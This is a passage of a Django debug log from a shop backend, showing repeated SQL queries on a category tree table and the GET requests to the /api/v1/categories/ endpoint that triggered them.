"shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 09:29:17,183 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 09:29:17,187 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [13/Dec/2019 09:29:17] "GET /api/v1/categories/ HTTP/1.0" 200 1769 DEBUG 2019-12-13 09:29:19,142 utils 11259 139831317362432 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 09:29:19,147 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 09:29:19,149 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 09:29:19,151 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 09:29:19,153 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 09:29:19,156 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 09:29:19,158 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 09:29:19,160 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 09:29:19,162 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 09:29:19,164 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 09:29:19,167 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [13/Dec/2019 09:29:19] "GET /api/v1/categories/ HTTP/1.0" 200 1769 DEBUG 2019-12-13 09:29:40,007 utils 11259 139831317362432 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 09:29:40,013 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 09:29:40,015 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 09:29:40,018 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 09:29:40,020 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 09:29:40,022 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 09:29:40,025 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 09:29:40,027 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 09:29:40,029 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 09:29:40,032 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 09:29:40,034 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [13/Dec/2019 09:29:40] "GET /api/v1/categories/ HTTP/1.0" 200 1769 DEBUG 2019-12-13 09:30:12,530 utils 11259 139831317362432 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 09:30:12,539 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 09:30:12,542 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 09:30:12,544 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 09:30:12,547 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 09:30:12,549 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 09:30:12,551 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 09:30:12,554 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 09:30:12,556 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 09:30:12,559 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 09:30:12,561 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [13/Dec/2019 09:30:12] "GET /api/v1/categories/ HTTP/1.0" 200 1769 DEBUG 2019-12-13 09:31:03,450 utils 11259 139831317362432 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 09:31:03,455 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 09:31:03,458 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 09:31:03,460 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 09:31:03,463 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 09:31:03,465 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 09:31:03,468 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 09:31:03,471 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 09:31:03,474 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 09:31:03,476 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 09:31:03,479 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [13/Dec/2019 09:31:03] "GET /api/v1/categories/ HTTP/1.0" 200 1769 DEBUG 2019-12-13 09:31:04,285 utils 11259 139831317362432 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 09:31:04,293 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 09:31:04,296 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 09:31:04,299 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 09:31:04,303 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 09:31:04,306 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 09:31:04,308 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 09:31:04,311 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 09:31:04,314 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 09:31:04,317 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 09:31:04,320 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [13/Dec/2019 09:31:04] "GET /api/v1/categories/ HTTP/1.0" 200 1769 DEBUG 2019-12-13 09:31:11,882 utils 11259 139831317362432 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 09:31:11,887 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 09:31:11,889 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 09:31:11,891 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 09:31:11,894 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 09:31:11,896 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 09:31:11,898 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 09:31:11,900 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 09:31:11,903 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 09:31:11,905 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" 